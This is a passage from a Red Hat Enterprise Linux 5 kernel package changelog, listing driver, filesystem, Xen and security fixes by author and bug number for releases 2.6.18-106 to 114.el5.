key errors up at mount time (Eric Sandeen ) [440413]\n- [fs] ecryptfs: update to 2.6.26 codebase (Eric Sandeen ) [449668]\n- Revert [misc] fix wrong test in wait_task_stopped (Anton Arapov ) [382211]\n[2.6.18-114.el5]\n- [xen] cpufreq: fix Nehalem/Supermicro systems (Rik van Riel ) [458894]\n- [net] enable TSO if supported by at least one device (Herbert Xu ) [461866]\n- [crypto] fix panic in hmac self test (Neil Horman ) [461537]\n- [scsi] qla2xxx/qla84xx: update to upstream for RHEL-5.3 (Marcus Barrow ) [461414]\n- [misc] hpilo: cleanup device_create for RHEL-5.3 (tcamuso@redhat.com ) [437212]\n- [misc] hpilo: update driver to 0.5 (tcamuso@redhat.com ) [437212]\n- [misc] hpilo: update to upstream 2.6.27 (tcamuso@redhat.com ) [437212]\n- [misc] futex: private futexes (Peter Zijlstra ) [460593]\n- [misc] preempt-notifiers implementation (Eduardo Habkost ) [459838]\n- [scsi] fusion: update to version 3.04.07 (Tomas Henzl ) [442025]\n- [fs] ext4/vfs/mm: core delalloc support (Eric Sandeen ) [455452]\n- [net] r8169: add support and fixes (Ivan Vecera ) [251252 441626 442635 443623 452761 453563 457892]\n- [md] LVM raid-1 performance fixes (Mikulas Patocka ) [438153]\n- [md] LVM raid-1 performance fixes (Mikulas Patocka ) [438153]\n- [xen] kdump: ability to use makedumpfile with vmcoreinfo (Neil Horman ) [454498]\n- [scsi] aic79xx: reset HBA on kdump kernel boot (Neil Horman ) [458620]\n- [fs] implement fallocate syscall (Eric Sandeen ) [450566]\n- [misc] better clarify package descriptions (Don Zickus ) [249726]\n- [audit] audit TTY input (Miloslav Trmac ) [244135]\n- [scsi] qla2xxx - mgmt. API for FCoE, NetLink (Marcus Barrow ) [456900]\n- [scsi] qla2xxx - mgmt. API, CT pass thru (Marcus Barrow ) [455900]\n- [misc] hrtimer optimize softirq (George Beshers ) [442148]\n- [misc] holdoffs in hrtimer_run_queues (George Beshers ) [442148]\n- [xen] netfront xenbus race (Markus Armbruster ) [453574]\n- [gfs2] NFSv4 delegations fix for cluster systems (Brad Peters ) [433256]\n- [scsi] qla2xxx: update 8.02.00-k1 to 8.02.00.k4 (Marcus Barrow ) [455264]\n- [scsi] qla2xxx: upstream changes from 8.01.07-k7 (Marcus Barrow ) [453685]\n- [scsi] qla2xxx: add more statistics (Marcus Barrow ) [453441]\n- [scsi] qla2xxx: add ISP84XX support (Marcus Barrow ) [442083]\n- [ia64] set default max_purges=1 regardless of PAL return (Luming Yu ) [451593]\n- [ia64] param for max num of concurrent global TLB purges (Luming Yu ) [451593]\n- [ia64] multiple outstanding ptc.g instruction support (Luming Yu ) [451593]\n- [scsi] ST: buffer size doesnt match block size panics (Ivan Vecera ) [443645]\n- [scsi] fix medium error handling with bad devices (Mike Christie ) [431365]\n- [xen] ia64: VT-i2 performance addendum (Bill Burns ) [437096]\n- [xen] HV: ability to use makedumpfile with vmcoreinfo (Neil Horman ) [454498]\n- [xen] ia64: vps save restore patch (Bill Burns ) [437096]\n[2.6.18-113.el5]\n- [xen] remove /proc/xen*/* from bare-metal and FV guests (Don Dutile ) [461532]\n[2.6.18-112.el5]\n- [fs] jbd: test BH_write_EIO to detect errors on metadata (Hideo AOKI ) [439581]\n- [wireless] rt2x00: avoid NULL-ptr deref when probe fails (John W. Linville ) [448763]\n- [x86_64] suspend to disk fails with >4GB of RAM (Matthew Garrett ) [459980]\n- [char] add range_is_allowed check to mmap_mem (Eugene Teo ) [460857]\n- [acpi] add 3.0 _TSD _TPC _TSS _PTC throttling support (Brian Maly ) [440099]\n- [scsi] add scsi device handlers config options (Mike Christie ) [438761]\n- [scsi] scsi_dh: add ALUA handler (mchristi@redhat.com ) [438761]\n- [scsi] scsi_dh: add rdac handler (mchristi@redhat.com ) [438761]\n- [md] dm-mpath: use SCSI device handler (mchristi@redhat.com ) [438761]\n- [scsi] add infrastructure for SCSI Device Handlers (mchristi@redhat.com ) [438761]\n- [misc] driver core: port bus notifiers (mchristi@redhat.com ) [438761]\n- [fs] binfmt_misc: avoid potential kernel stack overflow (Vitaly Mayatskikh ) [459463]\n- [CRYPTO] tcrypt: Change the XTEA test vectors (Herbert Xu ) [446522]\n- [CRYPTO] skcipher: Use RNG instead of get_random_bytes (Herbert Xu ) [446526]\n- [CRYPTO] rng: RNG interface and implementation (Herbert Xu ) [446526]\n- [CRYPTO] api: Add fips_enable flag (Herbert Xu ) [444634]\n- [CRYPTO] cryptomgr - Test ciphers using ECB (Herbert Xu ) [446522]\n- [CRYPTO] api - Use test infrastructure (Herbert Xu ) [446522]\n- [CRYPTO] cryptomgr - Add test infrastructure (Herbert Xu ) [446522]\n- [CRYPTO] tcrypt - Add alg_test interface (Herbert Xu ) [446522]\n- [CRYPTO] tcrypt: self test for des3_ebe cipher (Herbert Xu ) [446522]\n- [CRYPTO] api: missing accessors for new crypto_alg field (Herbert Xu ) [446522]\n- [CRYPTO] tcrypt: Abort and only log if there is an error (Herbert Xu ) [446522]\n- [CRYPTO] tcrypt: Avoid using contiguous pages (Herbert Xu ) [446522]\n- [CRYPTO] tcrpyt: Remove unnecessary kmap/kunmap calls (Herbert Xu ) [446522]\n- [CRYPTO] tcrypt: Catch cipher destination mem corruption (Herbert Xu ) [446522]\n- [CRYPTO] tcrypt: Shrink the tcrypt module (Herbert Xu ) [446522]\n- [CRYPTO] tcrypt: AES CBC test vector from NIST SP800-38A (Herbert Xu ) [446522]\n- [CRYPTO] tcrypt: Change the usage of the test vectors (Herbert Xu ) [446522]\n- [CRYPTO] tcrypt: Shrink speed templates (Herbert Xu ) [446522]\n- [CRYPTO] tcrypt: Group common speed templates (Herbert Xu ) [446522]\n- [fs] jdb: fix error handling for checkpoint I/O (Hideo AOKI ) [439581]\n- [fs] ext3: add checks for errors from jbd (Hideo AOKI ) [439581]\n- [fs] jbd: fix commit code to properly abort journal (Hideo AOKI ) [439581]\n- [fs] jbd: dont dirty original metadata buffer on abort (Hideo AOKI ) [439581]\n- [fs] jdb: abort when failed to log metadata buffers (Hideo AOKI ) [439581]\n- [fs] ext3: dont read inode block if buf has write error (Hideo AOKI ) [439581]\n- [fs] jdb: add missing error checks for file data writes (Hideo AOKI ) [439581]\n- [net] tun: add IFF_VNET_HDR, TUNGETFEATURES, TUNGETIFF (Herbert Xu ) [459719]\n- [acpi] increase deep idle state residency on platforms-2 (Matthew Garrett ) [455449]\n- [acpi] increase deep idle state residency on platforms (Matthew Garrett ) [455447]\n- [acpi] cpufreq: update to upstream for RHEL-5.3 (Matthew Garrett ) [449787]\n- [acpi] thinkpad_acpi: update to upstream for RHEL-5.3 (Matthew Garrett ) [457101]\n- [xen] fix crash on IRQ exhaustion and increase NR_IRQS (Bill Burns ) [442736]\n- [ide] enable DRAC4 (John Feeney ) [459197]\n- [md] move include files to include/linux for exposure (Jonathan Brassow ) [429337]\n- [md] expose dm.h macros (Jonathan Brassow ) [429337]\n- [md] remove internal mod refs fields from interface (Jonathan Brassow ) [429337]\n- [md] dm-log: move register functions (Jonathan Brassow ) [429337]\n- [md] dm-log: clean interface (Jonathan Brassow ) [429337]\n- [md] clean up the dm-io interface (Jonathan Brassow ) [429337]\n- [md] dm-log: move dirty log into separate module (Jonathan Brassow ) [429337]\n- [md] device-mapper interface exposure (Jonathan Brassow ) [429337]\n- [cifs] enable SPNEGO and DFS upcalls in config-generic (Jeff Layton ) [453462]\n- [fs] cifs: latest upstream for RHEL-5.3 (Jeff Layton ) [453462 431868 443395 445522 446142 447400]\n- [fs] introduce a function to register iget failure (Jeff Layton ) [453462]\n- [fs] proc: fix ->openless usage due to ->proc_fops flip (Jeff Layton ) [453462]\n- [security] key: fix lockdep warning when revoking auth (Jeff Layton ) [453462]\n- [security] key: increase payload size when instantiating (Jeff Layton ) [453462]\n- [fs] call flush_disk after detecting an online resize (Jeff Moyer ) [444964]\n- [fs] add flush_disk to flush out common buffer cache (Jeff Moyer ) [444964]\n- [fs] check for device resize when rescanning partitions (Jeff Moyer ) [444964]\n- [fs] adjust block device size after an online resize (Jeff Moyer ) [444964]\n- [fs] wrapper for lower-level revalidate_disk routines (Jeff Moyer ) [444964]\n- [scsi] sd: revalidate_disk wrapper (Jeff Moyer ) [444964]\n- [xen] virtio: add PV network and block drivers for KVM (Mark McLoughlin ) [446214]\n- [misc] remove MAX_ARG_PAGES limit: var length argument (Jerome Marchand ) [443659]\n- [misc] remove MAX_ARG_PAGES limit: rework execve audit (Jerome Marchand ) [443659]\n- [misc] remove MAX_ARG_PAGES limit: independent stack top (Jerome Marchand ) [443659]\n- [ia64] kprobes: support kprobe-booster (Masami Hiramatsu ) [438733]\n- [audit] fix compile when CONFIG_AUDITSYSCALL is disabled (Prarit Bhargava ) [452577]\n- [nfs] v4: handle old format exports gracefully (Brad Peters ) [427424]\n- [xen] x86: fix building with max_phys_cpus=128 (Bill Burns ) [447958]\n- [xen] Intel EPT 2MB patch (Bill Burns ) [426679]\n- [xen] Intel EPT Migration patch (Bill Burns ) [426679]\n- [xen] Intel EPT Patch (Bill Burns ) [426679]\n- [xen] Intel pre EPT Patch (Bill Burns ) [426679]\n- [xen] AMD 2MB backing pages support (Bhavna Sarathy ) [251980]\n[2.6.18-111.el5]\n- [ia64] kabi: remove sn symbols from whitelist (Jon Masters ) [455308]\n- [net] bnx2x: update to upstream version 1.45.21 (Andy Gospodarek ) [442026]\n- [net] cxgb3: updates and lro fixes (Andy Gospodarek ) [441959]\n- [net] niu: enable support for Sun Neptune cards (Andy Gospodarek ) [441416]\n- [scsi] scsi_host_lookup: error returns and NULL pointers (Tom Coughlan ) [460195]\n- [scsi] scsi_netlink: transport/LLD receive/event support (Tom Coughlan ) [460195]\n- [misc] install correct kernel chksum file for FIPS140-2 (Chris Lalancette ) [444632]\n- [net] ixgbe: update to version 1.3.18-k4 (Andy Gospodarek ) [436044]\n- [dlm] fix address compare (David Teigland ) [459585]\n- [net] bonding: fix locking in 802.3ad mode (Andy Gospodarek ) [457300]\n- [openib] OFED-1.3.2-pre update (Doug Ledford ) [439565 443476 453110 458886 459052 458375 459052 230035 460623]\n- [md] dm snapshot: use per device mempools (Mikulas Patocka ) [460846]\n- [md] dm kcopyd: private mempool (Mikulas Patocka ) [460845]\n- [md] deadlock with nested LVMs (Mikulas Patocka ) [460845]\n- [net] skge: dont clear MC state on link down (Andy Gospodarek ) [406051]\n- [net] sky2: re-enable 88E8056 for most motherboards (Andy Gospodarek ) [420961]\n- [net] update myri10ge 10Gbs ethernet driver (Flavio Leitner ) [357191]\n- [net] bnx2: update to upstream version 1.7.9 (Andy Gospodarek ) [441964]\n- [net] e1000e: update to upstream version 0.3.3.3-k2 (Andy Gospodarek ) [436045]\n- [net] tg3: update to upstream version 3.93 (Andy Gospodarek ) [441975 440958 436686]\n- [net] igb: update to upstream version 1.2.45-k2 (Andy Gospodarek ) [436040]\n- [misc] intel: new SATA, USB, HD Audio and I2C(SMBUS) ids (John Villalovos ) [433538]\n- [net] bnx2x: update to upstream version 1.45.20 (Andy Gospodarek ) [442026]\n- [net] ixgb: hardware support and other upstream fixes (Andy Gospodarek ) [441609]\n- [x86] amd oprofile: support instruction based sampling (Bhavna Sarathy ) [438385]\n- [scsi] cciss: support for sg_ioctl (Tomas Henzl ) [250483]\n- [scsi] cciss: support for new controllers (Tomas Henzl ) [437497 447427]\n- [net] pppoe: check packet length on all receive paths (Jiri Pirko ) [457013]\n- [scsi] iscsi: fix nop timeout detection (mchristi@redhat.com ) [453969]\n- [scsi] lpfc: update to version 8.2.0.30 (Tom Coughlan ) [441746]\n- [md] fix handling of sense buffer in eh commands (Doug Ledford ) [441640]\n- [md] fix error propogation in raid arrays (Doug Ledford ) [430984]\n- [md] dm: reject barrier requests (Milan Broz ) [458936]\n- [scsi] 3w-9xxx: update to version 2.26.08.003 (Tomas Henzl ) [451946]\n- [scsi] 3w-xxxx: update to version 1.26.03.000 (Tomas Henzl ) [451945]\n- [scsi] megaraid_sas: update to version 4.01-rh1 (Tomas Henzl ) [442913]\n- [md] dm snapshot: fix race during exception creation (Mikulas Patocka ) [459337]\n- [md] dm-snapshots: race condition and data corruption (Mikulas Patocka ) [459337]\n- [md] dm crypt: use cond_resched (Milan Broz ) [459095]\n- [md] dm mpath: fix bugs in error paths (Milan Broz ) [459092]\n- [mm] fix support for fast get user pages (Ed Pollard ) [447649]\n- [xen] ia64 PV: config file changes to add support (Don Dutile ) [442991]\n- [xen] ia64 PV: Kconfig additions (Don Dutile ) [442991]\n- [xen] ia64 PV: Makefile changes (Don Dutile ) [442991]\n- [xen] ia64 PV: shared used header file changes (Don Dutile ) [442991]\n- [IA64] Correct pernodesize calculation (George Beshers ) [455308]\n- [IA64] Fix large MCA bootmem allocation (George Beshers ) [455308]\n- [IA64] Disable/re-enable CPE interrupts on Altix (George Beshers ) [455308]\n- [IA64] Dont set psr.ic and psr.i simultaneously (George Beshers ) [455308]\n- [IA64] Support multiple CPUs going through OS_MCA (George Beshers ) [455308]\n- [IA64] Remove needless delay in MCA rendezvous (George Beshers ) [455308]\n- [IA64] Clean up CPE handler registration (George Beshers ) [455308]\n- [IA64] CMC/CPE: Reverse fetching log and checking poll (George Beshers ) [455308]\n- [IA64] Force error to surface in nofault code (George Beshers ) [455308]\n- [IA64] Fix Altix BTE error return status (George Beshers ) [455308]\n- [IA64] BTE error timer fix (George Beshers ) [455308]\n- [IA64] Update processor_info features (George Beshers ) [455308]\n- [IA64] More Itanium PAL spec updates (George Beshers ) [455308]\n- [IA64] Add se bit to Processor State Parameter structure (George Beshers ) [455308]\n- [IA64] Add dp bit to cache and bus check structs (George Beshers ) [455308]\n- [IA64] PAL calls need physical mode, stacked (George Beshers ) [455308]\n- [IA64] Cache error recovery (George Beshers ) [455308]\n- [IA64] handle TLB errors from duplicate itr.d dropins (George Beshers ) [455308]\n- [IA64] MCA recovery: Montecito support (George Beshers ) [455308]\n[2.6.18-110.el5]\n- [x86_64] use strncmp for memmap=exactmap boot argument (Prarit Bhargava ) [450244]\n- [wireless] compiler warning fixes for mac80211 update (John W. Linville ) [438391]\n- [serial] 8250: support for DTR/DSR hardware flow control (Aristeu Rozanski ) [445215]\n- [tty] add termiox support (Aristeu Rozanski ) [445211]\n- [vt] add shutdown method (Aristeu Rozanski ) [239604]\n- [tty] add shutdown method (Aristeu Rozanski ) [239604]\n- [tty] cleanup release_mem (Aristeu Rozanski ) [239604]\n- [mm] keep pagefault from happening under page lock (Josef Bacik ) [445433]\n- [wireless] iwlwifi: post-2.6.27-rc3 to support iwl5x00 (John W. Linville ) [438388]\n- [net] random32: seeding improvement (Jiri Pirko ) [458019]\n- [usb] work around ISO transfers in SB700 (Pete Zaitcev ) [457723]\n- [x86_64] AMD 8-socket APICID patches (Prarit Bhargava ) [459813]\n- [misc] make printk more robust against kexec shutdowns (Neil Horman ) [458368]\n- [fs] ext4: backport to rhel5.3 interfaces (Eric Sandeen ) [458718]\n- [fs] ext4: Kconfig/Makefile/config glue (Eric Sandeen ) [458718]\n- [fs] ext4: fixes from upstream pending patch queue (Eric Sandeen ) [458718]\n- [fs] ext4: revert delalloc upstream mods (Eric Sandeen ) [458718]\n- [fs] ext4: 2.6.27-rc3 upstream codebase (Eric Sandeen ) [458718]\n- [fs] ext4: new s390 bitops (Eric Sandeen ) [459436]\n- [usb] wacom: add support for Cintiq 20WSX (Aristeu Rozanski ) [248903]\n- [usb] wacom: add support for Intuos3 4x6 (Aristeu Rozanski ) [370471]\n- [usb] wacom: fix maximum distance values (Aristeu Rozanski ) [248903]\n- [x86] hpet: consolidate assignment of hpet_period (Brian Maly ) [435726]\n- [openib] lost interrupt after LPAR to LPAR communication (Brad Peters ) [457838]\n- [firmware] fix ibft offset calculation (mchristi@redhat.com ) [444776]\n- [block] performance fix for too many physical devices (Mikulas Patocka ) [459527]\n- [ide] Fix issue when appending data on an existing DVD (Mauro Carvalho Chehab ) [457025]\n- [misc] fix kernel builds on modern userland (Matthew Garrett ) [461540]\n- [x86_64] AMD IOMMU driver support (Bhavna Sarathy ) [251970]\n- [x86_64] GART iommu alignment fixes (Prarit Bhargava ) [455813]\n- [firewire] latest upstream snapshot for RHEL-5.3 (Jay Fenlason ) [449520 430300 429950 429951]\n- [net] ipv6: configurable address selection policy table (Neil Horman ) [446063]\n- [fs] relayfs: support larger on-memory buffer (Masami Hiramatsu ) [439269]\n- [xen] ia64: speed up hypercall for guest domain creation (Tetsu Yamamoto ) [456171]\n- [xen] make last processed event channel a per-cpu var (Tetsu Yamamoto ) [456171]\n- [xen] process event channel notifications in round-robin (Tetsu Yamamoto ) [456171]\n- [xen] use unlocked_ioctl in evtchn, gntdev and privcmd (Tetsu Yamamoto ) [456171]\n- [xen] disallow nested event delivery (Tetsu Yamamoto ) [456171]\n- [ppc64] spu: add cpufreq governor (Ed Pollard ) [442410]\n- [misc] cleanup header warnings and enable header check (Don Zickus ) [458360]\n- [mm] NUMA: over-committing memory compiler warnings (Larry Woodman ) [457264]\n- [misc] mmtimer: fixes for high resolution timers (George Beshers ) [442186]\n- [x86_64] xen: local DOS due to NT bit leakage (Eugene Teo ) [457722] {CVE-2006-5755}\n- [xen] ia64: mark resource list functions __devinit (Tetsu Yamamoto ) [430219]\n- [xen] ia64: issue ioremap HC in pci_acpi_scan_root (Tetsu Yamamoto ) [430219]\n- [xen] ia64: revert paravirt to ioremap /proc/pci (Tetsu Yamamoto ) [430219]\n- [xen] ia64: disable paravirt to remap /dev/mem (Tetsu Yamamoto ) [430219]\n- [x86_64] kprobe: kprobe-booster and return probe-booster (Masami Hiramatsu ) [438725]\n- [xen] NUMA: extend physinfo sysctl to export topo info (Tetsu Yamamoto ) [454711]\n- [xen] ia64: kludge for XEN_GUEST_HANDLE_64 (Tetsu Yamamoto ) [454711]\n- [xen] ia64: NUMA support (Tetsu Yamamoto ) [454711]\n- [misc] pipe support to /proc/sys/net/core_pattern (Neil Horman ) [410871]\n- [xen] ia64: fix and cleanup move to psr (Tetsu Yamamoto ) [447453]\n- [xen] ia64: turn off psr.i after PAL_HALT_LIGHT (Tetsu Yamamoto ) [447453]\n- [xen] ia64: fix ia64_leave_kernel (Tetsu Yamamoto ) [447453]\n- [xen] page scrub: serialise softirq with a new lock (Tetsu Yamamoto ) [456171]\n- [xen] serialize scrubbing pages (Tetsu Yamamoto ) [456171]\n- [xen] ia64: dont warn for EOI-ing edge triggered intr (Tetsu Yamamoto ) [430219]\n- [xen] ia64: remove regNaT fault message (Tetsu Yamamoto ) [430219]\n- [xen] ia64: suppress warning of __assign_domain_page (Tetsu Yamamoto ) [430219]\n- [xen] ia64: remove annoying log message (Tetsu Yamamoto ) [430219]\n- [xen] ia64: quieter Xen boot (Tetsu Yamamoto ) [430219]\n- [xen] ia64: quiet lookup_domain_mpa when domain is dying (Tetsu Yamamoto ) [430219]\n- [xen] ia64: fix XEN_SYSCTL_physinfo to handle NUMA info (Tetsu Yamamoto ) [454711]\n- [xen] ia64: fixup physinfo (Tetsu Yamamoto ) [454711]\n[2.6.18-109.el5]\n- [misc] cpufreq: fix format string bug (Vitaly Mayatskikh ) [459460]\n- [x86_64] perfctr: dont use CCCR_OVF_PMI1 on Pentium 4 Ds (Aristeu Rozanski ) [447618]\n- [wireless] iwlwifi: fix busted tkip encryption (John W. Linville ) [438388]\n- [wireless] ath5k: fixup Kconfig mess from update (John W. Linville ) [445578]\n- [fs] cifs: fix O_APPEND on directio mounts (Jeff Layton ) [460063]\n- [ia64] oprofile: recognize Montvale cpu as Itanium2 (Dave Anderson ) [452588]\n- [block] aoe: use use bio->bi_idx to avoid panic (Tom Coughlan ) [440506]\n- [x86] make bare-metal oprofile recognize other platforms (Markus Armbruster ) [458441]\n- [scsi] areca: update for RHEL-5.3 (Tomas Henzl ) [436068]\n- [sata] prep work for rhel5.3 (David Milburn ) [439247 445727 450962 451586 455445]\n- [sata] update driver to 2.6.26-rc5 (David Milburn ) [439247 442906 445727 450962 451586 455445 459197]\n- [openib] race between QP async handler and destroy_qp (Brad Peters ) [446109]\n- [mm] dont use large pages to map the first 2/4MB of mem (Larry Woodman ) [455504]\n- [mm] holdoffs in refresh_cpu_vm_stats using latency test (George Beshers ) [447654]\n- [ppc64] cell spufs: fix HugeTLB (Brad Peters ) [439483]\n- [ppc64] cell spufs: update with post 2.6.25 patches (Brad Peters ) [439483]\n- [xen] ia64 oprofile: recognize Montvale cpu as Itanium2 (Dave Anderson ) [452588]\n- [xen] x86: make xenoprof recognize other platforms (Markus Armbruster ) [458441]\n[2.6.18-108.el5]\n- [net] NetXen: remove performance optimization fix (Tony Camuso ) [457958]\n- [net] NetXen: update to upstream 2.6.27 (tcamuso@redhat.com ) [457958]\n- [net] NetXen: fixes from upstream 2.6.27 (tcamuso@redhat.com ) [457958]\n- [net] NetXen: cleanups from upstream 2.6.27 (tcamuso@redhat.com ) [457958]\n- [fs] anon_inodes implementation (Eduardo Habkost ) [459835]\n- [x86] PCI domain support (Jeff Garzik ) [228290]\n- [net] udp: possible recursive locking (Hideo AOKI ) [458909]\n- [gfs2] multiple writer performance issue (Abhijith Das ) [459738]\n- [alsa] asoc: double free and mem leak in i2c codec (Jaroslav Kysela ) [460103]\n- [net] ibmveth: cluster membership problems (Brad Peters ) [460379]\n- [net] ipv6: drop outside of box loopback address packets (Neil Horman ) [459556]\n- [net] dccp_setsockopt_change integer overflow (Vitaly Mayatskikh ) [459235] {CVE-2008-3276}\n- [x86] execute stack overflow warning on interrupt stack (Michal Schmidt ) [459810]\n- [ppc] export LPAR CPU utilization stats for use by hv (Brad Peters ) [439516]\n- [acpi] error attaching device data (peterm@redhat.com ) [459670]\n- [md] fix crashes in iterate_rdev (Doug Ledford ) [455471]\n- [utrace] signal interception breaks systemtap uprobes (Roland McGrath ) [459786]\n- [misc] markers and tracepoints: config patch (jbaron@redhat.com ) [329821]\n- [misc] markers and tracepoints: kabi fix-up patch (jbaron@redhat.com ) [329821]\n- [misc] markers and tracepoints: probes (jbaron@redhat.com ) [329821]\n- [misc] markers and tracepoints: sched patch (jbaron@redhat.com ) [329821]\n- [misc] markers and tracepoints: irq patch (jbaron@redhat.com ) [329821]\n- [misc] markers and tracepoints: create Module.markers (jbaron@redhat.com ) [329821]\n- [misc] markers and tracepoints: markers docs (jbaron@redhat.com ) [329821]\n- [misc] markers and tracepoints: markers samples (jbaron@redhat.com ) [329821]\n- [misc] markers and tracepoints: markers (jbaron@redhat.com ) [329821]\n- [misc] markers and tracepoints: tracepoint samples (jbaron@redhat.com ) [329821]\n- [misc] markers and tracepoints: tracepoints (jbaron@redhat.com ) [329821]\n- [misc] markers and tracepoints: samples patch (jbaron@redhat.com ) [329821]\n- [misc] markers and tracepoints: rcu-read patch (jbaron@redhat.com ) [329821]\n- [x86] nmi: fix disable and enable _timer_nmi_watchdog (Aristeu Rozanski ) [447618]\n- [x86] nmi: disable LAPIC/IO APIC on unknown_nmi_panic (Aristeu Rozanski ) [447618]\n- [x86] nmi: use lapic_adjust_nmi_hz (Aristeu Rozanski ) [447618]\n- [x86] nmi: update check_nmi_watchdog (Aristeu Rozanski ) [447618]\n- [x86] nmi: update reserve_lapic_nmi (Aristeu Rozanski ) [447618]\n- [x86] nmi: use setup/stop routines in suspend/resume (Aristeu Rozanski ) [447618]\n- [x86] nmi: change nmi_active usage (Aristeu Rozanski ) [447618]\n- [x86] nmi: update nmi_watchdog_tick (Aristeu Rozanski ) [447618]\n- [x86] nmi: introduce do_nmi_callback (Aristeu Rozanski ) [447618]\n- [x86] nmi: introduce per-cpu wd_enabled (Aristeu Rozanski ) [447618]\n- [x86] nmi: add perfctr infrastructure (Aristeu Rozanski ) [447618]\n- [x86_64] nmi: add missing prototypes in xen headers (Aristeu Rozanski ) [447618]\n- [x86_64] nmi: kill disable_irq calls (Aristeu Rozanski ) [447618]\n- [x86_64] nmi: disable LAPIC/IO APIC on unknown_nmi_panic (Aristeu Rozanski ) [447618]\n- [x86_64] nmi: use perfctr functions for probing (Aristeu Rozanski ) [447618]\n- [x86_64] nmi: update check_nmi_watchdog (Aristeu Rozanski ) [447618]\n- [x86_64] nmi: update reserve_lapic_nmi (Aristeu Rozanski ) [447618]\n- [x86_64] nmi: use new setup/stop routines in suspend/resume (Aristeu Rozanski ) [447618]\n- [x86_64] nmi: change nmi_active usage (Aristeu Rozanski ) [447618]\n- [x86_64] nmi: update nmi_watchdog_tick (Aristeu Rozanski ) [447618]\n- [x86_64] nmi: setup apic to handle both IO APIC and LAPIC (Aristeu Rozanski ) [447618]\n- [x86_64] nmi: introduce do_nmi_callback (Aristeu Rozanski ) [447618]\n- [x86_64] nmi: introduce per-cpu wd_enabled (Aristeu Rozanski ) [447618]\n- [x86_64] nmi: add perfctr infrastructure (Aristeu Rozanski ) [447618]\n- [mm] drain_node_page: drain pages in batch units (George Beshers ) [442179]\n- [mm] optimize ZERO_PAGE in 'get_user_pages' and fix XIP (Anton Arapov ) [452668] {CVE-2008-2372}\n- [x86_64] UEFI code support (Brian Maly ) [253295]\n[2.6.18-107.el5]\n- [scsi] mptscsi: check for null device in error handler (Doug Ledford ) [441832]\n- [openib] ehca: local CA ACK delay has an invalid value (Brad Peters ) [458378]\n- [gfs2] fix metafs (Abhijith Das ) [457798]\n- [sound] HDMI Audio: new PCI device ID (Bhavna Sarathy ) [459221]\n- [s390] cio: memory leak when ccw devices are discarded (Hans-Joachim Picht ) [459495]\n- [openib] ehca: handle two completions for one work req (Brad Peters ) [459142]\n- [scsi] cciss: possible race condition during init (Ivan Vecera ) [455663]\n- [wireless] rtl818x: add driver from 2.6.26 (John W. Linville ) [448764]\n- [wireless] rt2x00: add driver from 2.6.26 (John W. Linville ) [448763]\n- [wireless] ath5k: add driver from 2.6.26 (John W. Linville ) [445578]\n- [wireless] iwlwifi update to version from 2.6.26 (John W. Linville ) [438395]\n- [wireless] mac80211 update to version from 2.6.26 (John W. Linville ) [438391 438464 446076]\n- [wireless] infrastructure changes for mac80211 update (John W. Linville ) [438391]\n- [xen] xennet: coordinate ARP with backend network status (Herbert Xu ) [458934]\n- [x86] oprofile: enable additional perf counters (Markus Armbruster ) [426096]\n- [wireless] update zd1211rw to last non-mac80211 version (John W. Linville ) [448762]\n- [wireless] update bcm43xx driver to 2.6.25 (John W. Linville ) [448762]\n- [wireless] update ipw2x00 driver to 2.6.25 (John W. Linville ) [448762]\n- [wireless] update ieee80211 to 2.6.25 (John W. Linville ) [448762]\n- [xen] hv: support up to 128 cpus (Bill Burns ) [447958]\n- [gfs2] rm on multiple nodes causes panic (Bob Peterson ) [458289]\n- [gfs2] d_rwdirectempty fails with short read (Benjamin Marzinski ) [456453]\n- [sound] snd_seq_oss_synth_make_info info leak (Eugene Teo ) [458001] {CVE-2008-3272}\n- Revert: [mm] add support for fast get user pages (Ed Pollard ) [447649]\n- [xen] fix GDT allocation for 128 CPUs (Bill Burns ) [447958]\n- [xen] fix building with max_phys_cpus=128 (Bill Burns ) [447958]\n- [xen] limit dom0 to 32GB by default (Rik van Riel ) [453467]\n- [xen] automatically make heap larger on large mem system (Rik van Riel ) [453467]\n[2.6.18-106.el5]\n- [x86_64] resume from s3 in text mode with >4GB of mem (Matthew Garrett ) [452961]\n- [x86] kdump: calgary iommu: use boot kernels TCE tables (Tom Coughlan ) [239272]\n- [net] neigh_destroy: call destructor before unloading (Brad Peters ) [449161]\n- [usb] removing bus with an open file causes an oops (Pete Zaitcev ) [450786]\n- [nfs] missing nfs_fattr_init in nfsv3 acl functions (Jeff Layton ) [453711]\n- [xen] x86: fix endless loop when GPF (Chris Lalancette ) [457093]\n- [dlm] user.c input validation fixes (David Teigland ) [458760]\n- [serial] support for Digi PCI-E 4-8port Async IO adapter (Brad Peters ) [439443]\n- [cpufreq] acpi: boot crash due to _PSD return-by-ref (John Villalovos ) [428909]\n- [x86] io_apic: check timer with irq off (Brian Maly ) [432407]\n- [nfs] v4: dont reuse expired nfs4_state_owner structs (Jeff Layton ) [441884]\n- [nfs] v4: credential ref leak in nfs4_get_state_owner (Jeff Layton ) [441884]\n- [xen] PVFB probe & suspend fixes fix (Markus Armbruster ) [459107]\n- [x86] acpi: prevent resources from corrupting memory (Prarit Bhargava ) [458988]\n- [mm] add support for fast get user pages (Ed Pollard ) [447649]\n- [ipmi] control BMC device ordering (peterm@redhat.com ) [430157]\n- [net] pppoe: fix skb_unshare_check call position (Jiri Pirko ) [459062]\n- [net] ipv6: use timer pending to fix bridge ref count (Jiri Pirko ) [457006]\n- [nfs] v4: Poll aggressively when handling NFS4ERR_DELAY (Jeff Layton ) [441884]\n- [net] ixgbe: fix EEH recovery time (Brad Peters ) [457466]\n- [net] pppoe: unshare skb before anything else (Jiri Pirko ) [457018]\n- [ppc64] EEH: facilitate vendor driver recovery (Brad Peters ) [457253]\n- [ia64] fix to check module_free parameter (Masami Hiramatsu ) [457961]\n- [video] make V4L2 less verbose (Mauro Carvalho Chehab ) [455230]\n- [autofs4] remove unused ioctls (Ian Kent ) [452139]\n- [autofs4] reorganize expire pending wait function calls (Ian Kent ) [452139]\n- [autofs4] fix direct mount pending expire race (Ian Kent ) [452139]\n- [autofs4] fix indirect mount pending expire race (Ian Kent ) [452139]\n- [autofs4] fix pending checks (Ian Kent ) [452139]\n- [autofs4] cleanup redundant readdir code (Ian Kent ) [452139]\n- [autofs4] keep most direct and indirect dentrys positive (Ian Kent ) [452139]\n- [autofs4] fix waitq memory leak (Ian Kent ) [452139]\n- [autofs4] check communication pipe is valid for write (Ian Kent ) [452139]\n- [autofs4] fix waitq locking (Ian Kent ) [452139]\n- [autofs4] fix pending mount race (Ian Kent ) [452139]\n- [autofs4] use struct qstr in waitq.c (Ian Kent ) [452139]\n- [autofs4] use lookup intent flags to trigger mounts (Ian Kent ) 